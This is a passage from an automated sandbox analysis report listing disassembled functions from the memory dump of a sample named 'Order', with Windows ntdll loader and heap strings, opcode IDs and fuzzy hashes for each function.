                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                    • API String ID: 0-861424205
                                                                                                                                    • Opcode ID: 2081ec510071fe228d9571558058928c86d0dcdd046ed9135bd8d0fa0f2ccab4
                                                                                                                                    • Instruction ID: 3886ed3491a10ab646e154eb00e9c9a43d99f6cc655cf7a3667b0a3d12fd58f4
                                                                                                                                    • Opcode Fuzzy Hash: 2081ec510071fe228d9571558058928c86d0dcdd046ed9135bd8d0fa0f2ccab4
                                                                                                                                    • Instruction Fuzzy Hash: 3031E936F402257BF7218B998DC5FAABB79EFA4A50F050059FB0C77245D270AA01C6A1
                                                                                                                                    Function 0198096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01982DF0: LdrInitializeThunk.NTDLL ref: 01982DFA
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980BA3
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980BB6
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980D60
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980D74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1404860816-0
                                                                                                                                    • Opcode ID: 7514136761c2a554b29e07739d21aab689c7ca1ad212b997c3e683cbccc19581
                                                                                                                                    • Instruction ID: 369a7155a3c4b2a271470fc5bf2f38f5af22f6c10a55d6822b7e2011f66a80e4
                                                                                                                                    • Opcode Fuzzy Hash: 7514136761c2a554b29e07739d21aab689c7ca1ad212b997c3e683cbccc19581
                                                                                                                                    • Instruction Fuzzy Hash: 37426CB2900715DFDB61DF28C980BAAB7F8BF44314F1445A9E98DEB242D770A984CF60
                                                                                                                                    Function 0194A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                    • API String ID: 0-379654539
                                                                                                                                    • Opcode ID: 32b332302b96a39907b6c4c59e785b77f44f415119f85991a0420bfee7017833
                                                                                                                                    • Instruction ID: 446a4967066c8e52600aea194c30a98db43c2d00a685ea1cbfce339dc7eb60d8
                                                                                                                                    • Opcode Fuzzy Hash: 32b332302b96a39907b6c4c59e785b77f44f415119f85991a0420bfee7017833
                                                                                                                                    • Instruction Fuzzy Hash: F1C19B74548382CFD715CF58C144F6AB7E8FF84704F04496AF99A8B291E738CA49CB92
                                                                                                                                    Function 01978402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • LdrpInitializeProcess, xrefs: 01978422
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01978421
                                                                                                                                    • @, xrefs: 01978591
                                                                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0197855E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-1918872054
                                                                                                                                    • Opcode ID: 2706a310b914fb5f48f7127fb3b0a749d3f84f25f4ce14a81422f3c563502f9e
                                                                                                                                    • Instruction ID: 2aa38375ad087932ecb337df4bb9f3936c2b04daeb8e294580585fb35150ac3e
                                                                                                                                    • Opcode Fuzzy Hash: 2706a310b914fb5f48f7127fb3b0a749d3f84f25f4ce14a81422f3c563502f9e
                                                                                                                                    • Instruction Fuzzy Hash: 0C916871508345AFE721EF65CC85FABBAECBF84784F40092EFA8C96151E270D944CB62
                                                                                                                                    Function 0197273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019B21D9, 019B22B1
                                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 019B21DE
                                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019B22B6
                                                                                                                                    • .Local, xrefs: 019728D8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                    • API String ID: 0-1239276146
                                                                                                                                    • Opcode ID: 03f59b449ac6f3c60b12b9dcc021ee7a70186eda2be0a6f635c646809fc8af8b
                                                                                                                                    • Instruction ID: b4c5edd95fae2561be4ab7e3058d98f36014fbe25cd5b1d220d2f1f9aac516c7
                                                                                                                                    • Opcode Fuzzy Hash: 03f59b449ac6f3c60b12b9dcc021ee7a70186eda2be0a6f635c646809fc8af8b
                                                                                                                                    • Instruction Fuzzy Hash: FDA1B031910229DBDB25CF68C984BE9B7B5FF58354F2845E9D90CAB251D730AE81CF90
                                                                                                                                    Function 01974AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 019B342A
                                                                                                                                    • RtlDeactivateActivationContext, xrefs: 019B3425, 019B3432, 019B3451
                                                                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 019B3456
                                                                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 019B3437
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                    • API String ID: 0-1245972979
                                                                                                                                    • Opcode ID: 5fa1dcf96d74ead1399a172c1a8bb12c51d0bb859d96623a182fb016561b531f
                                                                                                                                    • Instruction ID: de4a75749a2708e1a0de6e3d4823bbe1c098361287fd4fcbc3ee0bee879bc4aa
                                                                                                                                    • Opcode Fuzzy Hash: 5fa1dcf96d74ead1399a172c1a8bb12c51d0bb859d96623a182fb016561b531f
                                                                                                                                    • Instruction Fuzzy Hash: 356121366007129BD722CF1DC981FBAB7EABF80B51F19852DE85D9B242D734E901CB91
                                                                                                                                    Function 019464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 019A1028
                                                                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 019A0FE5
                                                                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019A10AE
                                                                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 019A106B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                    • API String ID: 0-1468400865
                                                                                                                                    • Opcode ID: 9b836927c9c42dddff9c12a0ab318837b2c77f95102d504f962b460f381f2072
                                                                                                                                    • Instruction ID: c5656b6ebc36bef3f380fd7b47d1181235f29b8adbf3110a396a85d0d161e7ae
                                                                                                                                    • Opcode Fuzzy Hash: 9b836927c9c42dddff9c12a0ab318837b2c77f95102d504f962b460f381f2072
                                                                                                                                    • Instruction Fuzzy Hash: 9E71CDB19043459FCB21EF18C884F9B7BADAF96764F400868F94D8B246D334D589CBD2
                                                                                                                                    Function 0196245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 019AA9A2
                                                                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 019AA992
                                                                                                                                    • apphelp.dll, xrefs: 01962462
                                                                                                                                    • LdrpDynamicShimModule, xrefs: 019AA998
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-176724104
                                                                                                                                    • Opcode ID: 3c870527c84c305179e94551ac807d6a6d34faa1671acb6fe8c003db31e60f99
                                                                                                                                    • Instruction ID: cb4de5b81f391a4724a2310160ab95054d5022aceab9826f932cf103a342628a
                                                                                                                                    • Opcode Fuzzy Hash: 3c870527c84c305179e94551ac807d6a6d34faa1671acb6fe8c003db31e60f99
                                                                                                                                    • Instruction Fuzzy Hash: 4A316879A00202ABDB32DF5DDC85FAA7BB9FFC8B00F550419F8096B245C7B49946C790
                                                                                                                                    Function 019529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • HEAP[%wZ]: , xrefs: 01953255
                                                                                                                                    • HEAP: , xrefs: 01953264
                                                                                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0195327D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                    • API String ID: 0-617086771
                                                                                                                                    • Opcode ID: 6b52603d93f77221a7d295e8f86a434a2a0d61aef288cf86f0cd47315569c006
                                                                                                                                    • Instruction ID: f0a151fba94ad02f85fee498b7772fa67610108a17811ecc79c93493052ccbfc
                                                                                                                                    • Opcode Fuzzy Hash: 6b52603d93f77221a7d295e8f86a434a2a0d61aef288cf86f0cd47315569c006
                                                                                                                                    • Instruction Fuzzy Hash: C692BC71A04249DFDB65CF68C440BAEBBF5FF48304F188499E84AAB392D735AA45CF50
                                                                                                                                    Function 01950770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                    • API String ID: 0-4253913091
                                                                                                                                    • Opcode ID: 0bf4274b762defb600fec98e9da4c1cffda4d32b19c7c7ec1261cf913b778ed6
                                                                                                                                    • Instruction ID: 032e0c581ba4a4c4c47e61bfb87c54c56400ce83143bf8beac20f86da3e62118
                                                                                                                                    • Opcode Fuzzy Hash: 0bf4274b762defb600fec98e9da4c1cffda4d32b19c7c7ec1261cf913b778ed6
                                                                                                                                    • Instruction Fuzzy Hash: FDF1AB30B00606DFEB55CF68C894F6AB7B5FF84304F198568E91AAB385D730E985CB91
                                                                                                                                    Function 01966962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $@
                                                                                                                                    • API String ID: 0-1077428164
                                                                                                                                    • Opcode ID: 7f21551a06d3198c5f0640c2ff6b0ac7ef363fd70bbd3084aec1e0797e80f22f
                                                                                                                                    • Instruction ID: a3c25f7fb427ffaaf6b57667a5c0d35219a93e314cd2ad85d083e27ceb52bbb9
                                                                                                                                    • Opcode Fuzzy Hash: 7f21551a06d3198c5f0640c2ff6b0ac7ef363fd70bbd3084aec1e0797e80f22f
                                                                                                                                    • Instruction Fuzzy Hash: 53C260716083419FD729CF68C881BABBBE9BFC8754F04892DE98D97241D734D845CBA2
                                                                                                                                    Function 0193A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                    • API String ID: 0-2779062949
                                                                                                                                    • Opcode ID: 2e5c7d0f485f819ac8ad71ed988fa94fa2dc6a669641b9bfbdd9b9b21e737cd2
                                                                                                                                    • Instruction ID: 1548142f0d65dd7dcca3cc9ea8073d25d4a4b87d6292b98f17ef821ab3f53100
                                                                                                                                    • Opcode Fuzzy Hash: 2e5c7d0f485f819ac8ad71ed988fa94fa2dc6a669641b9bfbdd9b9b21e737cd2
                                                                                                                                    • Instruction Fuzzy Hash: F6A14B759116299BDF31DF68CC88BAAB7B8EF88711F1001EAE90DA7250D7359E84CF50
                                                                                                                                    Function 01960BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 019AA10F
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 019AA121
                                                                                                                                    • LdrpCheckModule, xrefs: 019AA117
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-161242083
                                                                                                                                    • Opcode ID: eda8f4746f670e19246eebb07dd1c11fe4880389522a2b829b5028d2650ed626
                                                                                                                                    • Instruction ID: 573f599d3dbf714891d0db4e66b22b48aeebaf67c2f23871568cfbfccccbce2a
                                                                                                                                    • Opcode Fuzzy Hash: eda8f4746f670e19246eebb07dd1c11fe4880389522a2b829b5028d2650ed626
                                                                                                                                    • Instruction Fuzzy Hash: A671B374E00205AFDB25DF68CD85BAEB7F8FB88304F18446DE4099B255D739A946CB60
                                                                                                                                    Function 0197C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 019B82DE
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 019B82E8
                                                                                                                                    • Failed to reallocate the system dirs string !, xrefs: 019B82D7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-1783798831
                                                                                                                                    • Opcode ID: ad998049b97891764d97d46a2dff9a0653bbc2e591df91cb72da3a61a4574291
                                                                                                                                    • Instruction ID: 2b4115b020d194cce72932c3e6ec201f7f40cf0fab243983db86303b430b5423
                                                                                                                                    • Opcode Fuzzy Hash: ad998049b97891764d97d46a2dff9a0653bbc2e591df91cb72da3a61a4574291
                                                                                                                                    • Instruction Fuzzy Hash: 6341D175544302ABD721EB68DD85B9BBBECBF89790F00492AF94DD3250EB70D901CB92
                                                                                                                                    Function 019FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • @, xrefs: 019FC1F1
                                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019FC1C5
                                                                                                                                    • PreferredUILanguages, xrefs: 019FC212
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                    • API String ID: 0-2968386058
                                                                                                                                    • Opcode ID: bf51a960a6dac28e2d27706e3783fc47aef16d17f72f68553a33777bde750ec5
                                                                                                                                    • Instruction ID: e45cdb0e5a60d41cf92e06514e1543f8bc3312d75fce74bfeab0d4eac28fd10d
                                                                                                                                    • Opcode Fuzzy Hash: bf51a960a6dac28e2d27706e3783fc47aef16d17f72f68553a33777bde750ec5
                                                                                                                                    • Instruction Fuzzy Hash: 91414F75A0020DBBEB11DAD8C851FEEBBBCEB54705F14806AEA0DA7240D774DA448B50
                                                                                                                                    Function 019D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                    • API String ID: 0-1373925480
                                                                                                                                    • Opcode ID: 060ed4ba260110d343f651e46fdcf4b72b16435c7e628a06ddadb101d0291c48
                                                                                                                                    • Instruction ID: 209dc5b7c44760f3770bf9f831288cc5c0c80248ca936c41a7c36166f34aafed
                                                                                                                                    • Opcode Fuzzy Hash: 060ed4ba260110d343f651e46fdcf4b72b16435c7e628a06ddadb101d0291c48
                                                                                                                                    • Instruction Fuzzy Hash: 7F411331A003598BEB26DFE9C840BADBBB8FFA5340F14445ADA49FBB91D7348901CB51
                                                                                                                                    Function 019C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 019C4899
                                                                                                                                    • LdrpCheckRedirection, xrefs: 019C488F
                                                                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019C4888
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                    • API String ID: 0-3154609507
                                                                                                                                    • Opcode ID: de981eee978e375bb36b20e5efa652f75b544988e3755bfc2f4a0938918376c9
                                                                                                                                    • Instruction ID: 8d22a90f908aa216d366c49d324148e9dd1d69e27dc8c51036b2e857a7940ac4
                                                                                                                                    • Opcode Fuzzy Hash: de981eee978e375bb36b20e5efa652f75b544988e3755bfc2f4a0938918376c9
                                                                                                                                    • Instruction Fuzzy Hash: 89419D32B046519BDB22CE68D860A27BBE8AF89E51B05066DFDCC97255D730E801CB93
                                                                                                                                    Function 01950BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                    • API String ID: 0-2558761708
                                                                                                                                    • Opcode ID: 3c183e738e35b20432328c879b129e485bb6b63367b06563d8f557aa6ae4935a
                                                                                                                                    • Instruction ID: 2ffaeed25977beeb7884c48463f9fe15ac744010b6a9afaaca72d0d1ccab7634
                                                                                                                                    • Opcode Fuzzy Hash: 3c183e738e35b20432328c879b129e485bb6b63367b06563d8f557aa6ae4935a
                                                                                                                                    • Instruction Fuzzy Hash: 6B11E1323141029FEB69CB18C481F7AB3E9EF80B1AF1A8519F80EDB251DB30D849C791
                                                                                                                                    Function 019C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 019C2104
                                                                                                                                    • LdrpInitializationFailure, xrefs: 019C20FA
                                                                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 019C20F3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-2986994758
                                                                                                                                    • Opcode ID: 2f52c243b172f885cbb5199be51f77ba87a05b71d41805419ad89326eb8bb51c
                                                                                                                                    • Instruction ID: bd7553582a527c1e701d2931248374985cfe8dfbedf3e226caadfc0f48798c16
                                                                                                                                    • Opcode Fuzzy Hash: 2f52c243b172f885cbb5199be51f77ba87a05b71d41805419ad89326eb8bb51c
                                                                                                                                    • Instruction Fuzzy Hash: EBF0AF39A40318ABEA24EB4C9D46FA93B6CFB81E54F100069F64867285D2E0A941C792
                                                                                                                                    Function 019503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: #%u
                                                                                                                                    • API String ID: 48624451-232158463
                                                                                                                                    • Opcode ID: 3efb34f99a86ed14ffc23940e5bd80ceca3c6d58cae72c6a07806486c5bc1bd6
                                                                                                                                    • Instruction ID: 6a3065ca65c623510c8a0b0ffad245c3a72d7fb75bbfd9d1e2381460e94ffc69
                                                                                                                                    • Opcode Fuzzy Hash: 3efb34f99a86ed14ffc23940e5bd80ceca3c6d58cae72c6a07806486c5bc1bd6
                                                                                                                                    • Instruction Fuzzy Hash: 30714C71A0014A9FDB01DF98C980FAEBBF8BF48744F194065E909A7251E674EE05CBA1
                                                                                                                                    Function 0194A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • LdrResSearchResource Enter, xrefs: 0194AA13
                                                                                                                                    • LdrResSearchResource Exit, xrefs: 0194AA25
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                    • API String ID: 0-4066393604
                                                                                                                                    • Opcode ID: b87b54b607d99b3ef66886687d910749f08b4582a2964ce51bb2aff35a40d870
                                                                                                                                    • Instruction ID: 504aff2f34a9a8b67f6ddc204f82518cfce05dc1290574dbbe9e9387ccef7b98
                                                                                                                                    • Opcode Fuzzy Hash: b87b54b607d99b3ef66886687d910749f08b4582a2964ce51bb2aff35a40d870
                                                                                                                                    • Instruction Fuzzy Hash: FFE18271E802199FEB22CF99C980FAEBBBEFF54311F50442AE90AE7251D7349944CB50
                                                                                                                                    Function 01A0A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
